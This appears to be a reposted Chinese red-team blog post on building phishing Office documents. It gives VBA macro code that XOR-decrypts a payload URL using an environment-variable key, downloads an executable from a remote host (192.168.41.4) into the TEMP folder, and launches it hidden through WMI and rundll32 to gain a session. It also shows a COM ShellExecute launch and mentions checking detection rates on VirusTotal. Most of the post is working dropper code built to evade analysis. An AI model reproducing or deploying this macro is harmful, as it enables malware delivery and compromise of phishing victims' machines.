这个思路是在国外一个网站上看到的,原文在这(https://0xdf.gitlab.io/2018/07/31/malware-analysis-muddoc.html),在此感谢作者给出的思路,这里简单来给大家看下总体思路:
大体思路就是使用环境变量去xor解密远程url地址,然后落地化dll,调用rundll32去运行dll,得到sessIon。
我们先来看一下用了xor加密的函数(http://www.vbaexpress.com/kb/getarticle.php?kb_id=951):
Function XorC(ByVal sData As String, ByVal sKey As String) As StringDim l As Long, i As Long, byIn() As Byte, byOut() As Byte, byKey() As ByteDim bEncOrDec As BooleanIf Len(sData) = 0 Or Len(sKey) = 0 Then XorC = "Invalid argument(s) used": Exit FunctionIf Left$(sData, 3) = "xxx" ThenbEncOrDec = FalsesData = Mid$(sData, 4)ElsebEncOrDec = TrueEnd IfbyIn = sDatabyOut = sDatabyKey = sKeyl = LBound(byKey)For i = LBound(byIn) To UBound(byIn) - 1 Step 2byOut(i) = ((byIn(i) + Not bEncOrDec) Xor byKey(l)) - bEncOrDecl = l + 2If l > UBound(byKey) Then l = LBound(byKey)Next iXorC = byOutIf bEncOrDec Then XorC = "xxx" & XorCEnd Function
该函数接收两个参数,一个字符串、一个key。而为了安全起见,我们的key不直接写入到宏中,我们这里选择使用环境变量来获取key,机器上的环境变量可以使用set命令来查看:
我们在选择key是,要注意目标环境的变量,每个机器变量可能都不尽相同,不过有一些变量是相同的,我这里选择的是PROCESSOR_REVISION,值为9e0a,那么这里我们就要用到一个样本了,样本已上传到github(https://github.com/lengjibo/RedTeamTools/blob/master/windows/macros/encryptor.xls),该宏可用于加密我们的url地址:
得到一个base64的字符串,然后解密
然后用我们的xor解密函数,key使用Environ来获取,来进行解密:
解密出来的稍微有些问题,这里需要主要环境变量的大小写问题,然后,我们使用下载函数,下载我们的dll,也就是之前的代码:
Dim payload As StringDim namePrefix As StringDim nameSuffix As StringDim zzz As StringDim dollop As ObjectDim dstPath As StringDim savePath As StringnamePrefix = "AppLaunch-actual"nameSuffix = ".exe"payload = "http://192.168.41.4/AppLaunch.exe"zzz = payloadDim downloadfSet downloadf = CreateObject("WinHttp.WinHttpRequest.5.1")downloadf.Open "GET", zzz, Falsedownloadf.setRequestHeader "Host", "192.168.41.4"downloadf.SendSet dollop = CreateObject(StrReverse("maertS.bdodA"))dollop.Type = 1dollop.Opendollop.Write downloadf.responseBodydstPath = Environ$("TEMP") & "" & namePrefix & nameSuffixsavePath = dstPathdollop.savetofile savePath, 2
替换里面的指定位置的内容即可,然后调用wmi来运行rundll32来运行我们的dll.
Const HIDDEN_WINDOW = 0strComputer = "."abc = "rundll32" & " " & dstPath & ",Start"strGetObject = ("winmgmts:\.rootcimv2")Set objWMIService = GetObject(strGetObject)Set objStartup = objWMIService.Get("Win32_ProcessStartup")Set objConfig = objStartup.SpawnInstance_objConfig.ShowWindow = HIDDEN_WINDOWSet objProcess = GetObject(strGetObject & (":Win32_Process"))objProcess.Create abc, Null, objConfig, intProcessID
也就是稍微更改之前的代码即可,或者调用com组建进程调用:
Set obj = GetObject("new:C08AFD90-F2A1-11D1-8455-00A0C91F3880")obj.Document.Application.ShellExecute "calc",Null,"C:\Windows\System32",Null,0
然后测试:
vt测试:
原文始发于微信公众号(系统安全运维):钓鱼文档碎碎念
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论